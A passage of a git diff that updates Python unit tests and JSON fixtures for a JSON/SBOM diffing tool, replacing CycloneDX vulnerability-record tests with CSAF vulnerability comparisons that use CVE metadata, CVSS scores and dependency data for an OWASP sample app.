-    bom1 = BomVdr(id="CVE-2022-25881",options=options_1)
-    bom2 = BomVdr(id="CVE-2022-25881",options=options_1)
-    bom2.options.doc_num = 2
-    assert bom1 == bom2
-    bom2.id = "CVE-2022-25883"
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
-
-    bom1.bom_ref, bom2.bom_ref = "NPM-1091792/pkg:npm/base64url@0.0.6", "NPM-1091792/pkg:npm/base64url@0.0.6"
-    assert bom1 == bom2
-    bom2.bom_ref = "NPM-1091792/pkg:npm/base64url@0.0.7"
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
-
-    bom1.advisories = [{"url": "https://security.netapp.com/advisory/ntap-20230622-0008"}]
-    bom2.advisories = [{"url": "https://security.netapp.com/advisory/ntap-20230622-0008"}]
-    assert bom1 == bom2
-    bom2.advisories = [{"url": "https://security.netapp.com/advisory/ntap-20230622-0009"}]
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
-
-    bom1.affects = [BomVdrAffects({"ref": "pkg:npm/libxmljs2@0.33.0", "versions": [{
-        "range": "vers:npm/>=0.0.0|<=1.0.11", "status": "affected"}]}, options=bom1.options)]
-    bom2.affects = [BomVdrAffects(data={"ref": "pkg:npm/libxmljs2@0.33.0", "versions": [{
-        "range": "vers:npm/>=0.0.0|<=1.0.11", "status": "affected"}]}, options=bom2.options)]
-    assert bom1 == bom2
-    bom2.affects = [BomVdrAffects(data={"ref": "pkg:npm/libxmljs2@0.33.1", "versions": [{
-        "range": "vers:npm/>=0.0.0|<=1.0.11", "status": "affected"}]}, options=bom2.options)]
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
-
-    bom1.analysis = {"state": "exploitable", "detail": "See https://seclists.org/bugtraq/2019/May/68"}
-    bom2.analysis = {"state": "exploitable", "detail": "See https://seclists.org/bugtraq/2019/May/68"}
-    assert bom1 == bom2
-    bom1.analysis = {}
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
-
-    bom1.cwes = ["1333"]
-    bom2.cwes = ["1333"]
-    assert bom1 == bom2
-    bom2.cwes = ["1333", "1334"]
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
-
-    bom1.description = "lorem ipsum dolor sit amet"
-    bom2.description = "lorem ipsum dolor sit amet"
-    assert bom1 == bom2
-    bom2.description = "lorem ipsum dolor"
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1 = CsafVulnerability({"cve": "CVE-2022-25881"},options=options_1)
+    csaf2 = CsafVulnerability({"cve": "CVE-2022-25881"},options=options_1)
+    csaf2.options.doc_num = 2
+    assert csaf1 == csaf2
+    csaf2.cve = "CVE-2022-25883"
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.detail = "lorem ipsum dolor sit amet"
-    bom2.detail = "lorem ipsum dolor sit amet"
-    assert bom1 == bom2
-    bom2.detail = "lorem ipsum dolor"
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1.title, csaf2.title = "NPM-1091792/pkg:npm/base64url@0.0.6", "NPM-1091792/pkg:npm/base64url@0.0.6"
+    assert csaf1 == csaf2
+    csaf2.title = "NPM-1091792/pkg:npm/base64url@0.0.7"
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.properties = [{"name": "depscan:insights", "value": "Indirect dependency"}]
-    bom2.properties = [{"name": "depscan:insights", "value": "Indirect dependency"}]
-    assert bom1 == bom2
-    bom2.properties = [{"name": "depscan:insights", "value": "Indirect dependency"}, {"name": "depscan:prioritized", "value": "false"}]
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1.product_status = {
+        "known_affected": [
+          "org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"
+        ],
+        "known_not_affected": [
+          "org.apache.tomcat.embed/tomcat-embed-core@8.5.61"
+        ]
+      }
+    csaf2.product_status = {
+        "known_affected": [
+          "org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"
+        ],
+        "known_not_affected": [
+          "org.apache.tomcat.embed/tomcat-embed-core@8.5.61"
+        ]
+      }
+    assert csaf1 == csaf2
+    csaf2.product_status = {
+        "known_affected": [
+          "org.apache.tomcat.embed/tomcat-embed-core@vers:maven/>=8.0.0|<8.5.61"
+        ]
+      }
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.published, bom2.published = "2020-09-01T20:42:44", "2020-09-01T20:42:44"
-    assert bom1 == bom2
-    bom2.published = "2021-09-01T20:42:44"
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1.cwe = {"id": "502", "name": "Deserialization of Untrusted Data"}
+    csaf2.cwe = {"id": "502", "name": "Deserialization of Untrusted Data"}
+    assert csaf1 == csaf2
+    csaf2.cwe = {"id": "502"}
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.ratings = [{"method": "CVSSv31", "severity": "MEDIUM", "score": 5.0, "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"}]
-    bom2.ratings = [{"method": "CVSSv31", "severity": "MEDIUM", "score": 5.0, "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"}]
-    assert bom1 == bom2
-    bom2.ratings = [{"method": "CVSSv31", "severity": "MEDIUM", "score": 7.0, "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"}]
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1.notes = [
+        {
+          "category": "description",
+          "details": "Vulnerability Description",
+          "text": "Deserialization of Untrusted Data in logback"
+        },
+        {
+          "category": "details",
+          "details": "Vulnerability Details",
+          "text": "# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers."
+        }
+      ]
+    csaf2.notes = [{"category": "details", "details": "Vulnerability Details",
+        "text": "# Deserialization of Untrusted Data in logback In logback version 1.2.7 and prior versions, an attacker with the required privileges to edit configurations files could craft a malicious configuration allowing to execute arbitrary code loaded from LDAP servers."},
+        {
+          "category": "description",
+          "details": "Vulnerability Description",
+          "text": "Deserialization of Untrusted Data in logback"
+        }
+      ]
+    assert csaf1 == csaf2
+    csaf2.notes.pop()
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.recommendation, bom2.recommendation = "lorem ipsum dolor sit amet", "lorem ipsum dolor sit amet"
-    assert bom1 == bom2
-    bom2.recommendation = "lorem ipsum dolor"
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1.discovery_date, csaf2.discovery_date = "2020-09-01T20:42:44", "2020-09-01T20:42:44"
+    assert csaf1 == csaf2
+    csaf2.discovery_date = "2021-09-01T20:42:44"
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.references = [{"id": "CVE-2022-23541", "source": {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"}}]
-    bom2.references = [{"id": "CVE-2022-23541", "source": {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"}}]
-    assert bom1 == bom2
-    bom1.references.append({"id": "GHSA-hjrf-2m68-5959", "source": {"name": "GitHub Advisory", "url": "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959"}})
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1.scores = [{
+          "cvss_v3": {
+            "attackComplexity": "HIGH",
+            "attackVector": "NETWORK",
+            "availabilityImpact": "HIGH",
+            "baseScore": 6.6,
+            "baseSeverity": "MEDIUM",
+            "confidentialityImpact": "HIGH",
+            "environmentalScore": 6.6,
+            "environmentalSeverity": "MEDIUM",
+            "integrityImpact": "HIGH",
+            "modifiedAttackComplexity": "HIGH",
+            "modifiedAttackVector": "NETWORK",
+            "modifiedAvailabilityImpact": "HIGH",
+            "modifiedConfidentialityImpact": "HIGH",
+            "modifiedIntegrityImpact": "HIGH",
+            "modifiedPrivilegesRequired": "HIGH",
+            "modifiedScope": "UNCHANGED",
+            "modifiedUserInteraction": "NONE",
+            "privilegesRequired": "HIGH",
+            "scope": "UNCHANGED",
+            "temporalScore": 6.6,
+            "temporalSeverity": "MEDIUM",
+            "userInteraction": "NONE",
+            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+            "version": "3.1"
+          },
+          "products": [
+            "ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"
+          ]
+        }]
+    csaf2.scores = [{
+          "cvss_v3": {
+            "attackComplexity": "HIGH",
+            "attackVector": "NETWORK",
+            "availabilityImpact": "HIGH",
+            "baseScore": 6.6,
+            "baseSeverity": "MEDIUM",
+            "confidentialityImpact": "HIGH",
+            "environmentalScore": 6.6,
+            "environmentalSeverity": "MEDIUM",
+            "integrityImpact": "HIGH",
+            "modifiedAttackComplexity": "HIGH",
+            "modifiedAttackVector": "NETWORK",
+            "modifiedAvailabilityImpact": "HIGH",
+            "modifiedConfidentialityImpact": "HIGH",
+            "modifiedIntegrityImpact": "HIGH",
+            "modifiedPrivilegesRequired": "HIGH",
+            "modifiedScope": "UNCHANGED",
+            "modifiedUserInteraction": "NONE",
+            "privilegesRequired": "HIGH",
+            "scope": "UNCHANGED",
+            "temporalScore": 6.6,
+            "temporalSeverity": "MEDIUM",
+            "userInteraction": "NONE",
+            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+            "version": "3.1"
+          },
+          "products": [
+            "ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"
+          ]
+        }]
+    assert csaf1 == csaf2
+    csaf2.scores = [{
+          "cvss_v3": {
+            "attackComplexity": "HIGH",
+            "attackVector": "NETWORK",
+            "availabilityImpact": "HIGH",
+            "baseScore": 6.7,
+            "baseSeverity": "MEDIUM",
+            "confidentialityImpact": "HIGH",
+            "environmentalScore": 6.6,
+            "environmentalSeverity": "MEDIUM",
+            "integrityImpact": "HIGH",
+            "modifiedAttackComplexity": "HIGH",
+            "modifiedAttackVector": "NETWORK",
+            "modifiedAvailabilityImpact": "HIGH",
+            "modifiedConfidentialityImpact": "HIGH",
+            "modifiedIntegrityImpact": "HIGH",
+            "modifiedPrivilegesRequired": "HIGH",
+            "modifiedScope": "UNCHANGED",
+            "modifiedUserInteraction": "NONE",
+            "privilegesRequired": "HIGH",
+            "scope": "UNCHANGED",
+            "temporalScore": 6.6,
+            "temporalSeverity": "MEDIUM",
+            "userInteraction": "NONE",
+            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
+            "version": "3.1"
+          },
+          "products": [
+            "ch.qos.logback/logback-core@vers:maven/>=0.2.5|<=1.2.8"
+          ]
+        }]
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.source = {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"}
-    bom2.source = {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541", "name": "NVD"}
-    assert bom1 == bom2
-    bom2.source = {"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23542", "name": "NVD"}
-    assert bom1 != bom2
-    bom1.clear(), bom2.clear()
+    csaf1.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}]
+    csaf2.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}]
+    assert csaf1 == csaf2
+    csaf1.references.append({
+        "summary": "GHSA-hjrf-2m68-5959", "url": "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959"})
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
-    bom1.updated, bom2.updated = "2020-09-01T20:42:44", "2020-09-01T20:42:44"
-    assert bom1 == bom2
-    bom2.updated = "2021-09-01T20:42:44"
-    assert bom1 != bom2
+    csaf1.acknowledgements = [{"urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-23541"], "organization": "NVD"}]
+    csaf2.acknowledgements = [{"urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-23541"], "organization": "NVD"}]
+    assert csaf1 == csaf2
+    csaf2.acknowledgements = [{"urls": ["https://nvd.nist.gov/vuln/detail/CVE-2022-23542"], "organization": "NVD"}]
+    assert csaf1 != csaf2
+    csaf1.clear(), csaf2.clear()
 
 
 def test_csaf_diff_vuln_options_allow_new_data(options_3):
     # test --allow-new-data
     options_3_copy = deepcopy(options_3)
     options_3_copy.doc_num = 2
-    csaf1, csaf2 = CsafVulnerability(data={"title": "CVE-2022-25881"},options=options_3), CsafVulnerability(data={"title": "CVE-2022-25881"},options=options_3_copy)
-    assert csaf1 == csaf2
-    csaf1.title, csaf2.title = "CVE-2022-25883", ""
-    assert csaf1 != csaf2
-    csaf1.clear(), csaf2.clear()
+    csaf1, csaf2 = CsafVulnerability(data={},options=options_3), CsafVulnerability(data={},options=options_3_copy)
 
     csaf1.acknowledgements = []
     csaf2.acknowledgements = [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2024-39689"]}]
@@ -261,15 +248,10 @@ def test_csaf_diff_vuln_options_allow_new_data(options_3):
     assert csaf1 != csaf2
     csaf1.clear(), csaf2.clear()
 
-    csaf1.cwe = {"id": "345", "name": "Insufficient Verification of Data Authenticity"}
-    csaf2.cwe = {"id": "345", "name": "Insufficient Verification of Data Authenticity"}
-    assert csaf1 == csaf2
-    csaf1.cwe["id"] = "500"
-    assert csaf1 != csaf2
-    csaf1.clear(), csaf2.clear()
-
-    csaf1.discovery_date, csaf2.discovery_date = "", "2020-09-01T20:42:44"
+    csaf1.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}]
+    csaf2.references = [{"summary": "CVE-2022-23541", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23541"}]
     assert csaf1 == csaf2
-    csaf1.discovery_date, csaf2.discovery_date = csaf2.discovery_date, csaf1.discovery_date
+    csaf1.references.append({
+        "summary": "GHSA-hjrf-2m68-5959", "url": "https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-hjrf-2m68-5959"})
     assert csaf1 != csaf2
     csaf1.clear(), csaf2.clear()
diff --git a/test/test_custom_json_diff.py b/test/test_custom_json_diff.py
index 0bb4b67..1fe090f 100644
--- a/test/test_custom_json_diff.py
+++ b/test/test_custom_json_diff.py
@@ -3,7 +3,7 @@
 import pytest
 
 from custom_json_diff.lib.custom_diff import (
-    compare_dicts, get_diff, json_to_class
+    compare_dicts, get_bom_status, get_diff, json_to_class
 )
 from custom_json_diff.lib.custom_diff_classes import Options
 from custom_json_diff.lib.utils import sort_dict_lists
@@ -89,3 +89,17 @@ def test_sort_dict():
         "a": 1, "b": 2, "c": [1, 2, 3],
         "d": [{"name": "test 3", "value": 1}, {"name": "test 2", "value": 2}, {"value": 3}]
     }
+
+
+def test_get_bom_status():
+    diff_summary_1 = {}
+    diff_summary_2 = {}
+    assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 0
+    diff_summary_1 = {"components": {}}
+    assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 0
+    diff_summary_1 = {"components": {"applications": []}}
+    assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 0
+    diff_summary_1 = {"misc_data": {"key": "value"}}
+    assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 2
+    diff_summary_1["services"] = [{"name": "test"}]
+    assert max(get_bom_status(diff_summary_1), get_bom_status(diff_summary_2)) == 3
diff --git a/test/test_data.json b/test/test_data.json
index 96c1cec..d87dd00 100644
--- a/test/test_data.json
+++ b/test/test_data.json
@@ -1 +1 @@
-{"result_1": {"diff_summary": {"bom_1.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}, "bom_2.json": {"components": {"libraries": [{"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "group": "joda-time", "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}]}}}, "common_summary": {"components": {"frameworks": [{"bom-ref": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "type": "framework", "group": "org.springframework.cloud", "name": "spring-cloud-starter-config", "publisher": "Pivotal Software, Inc.", "purl": "pkg:maven/org.springframework.cloud/spring-cloud-starter-config@2.0.0.RELEASE?type=jar", "scope": "required", "version": "2.0.0.RELEASE"}]}}}, "result_10": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library", "version": "1.5.1"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library", "version": "2.10.2"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "MarkupSafe", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/markupsafe@1.1.1", "type": "library", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "itsdangerous", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/itsdangerous@1.1.0", "type": "library", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "click", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/click@7.1.2", "type": "library", "version": "7.1.2"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": [], "ref": "pkg:pypi/itsdangerous@1.1.0"}, {"dependsOn": [], "ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false, "endpoints": ["/create_user"], "name": "users-service"}], "specVersion": "1.5", "version": 2}, "result_11": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_12": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, 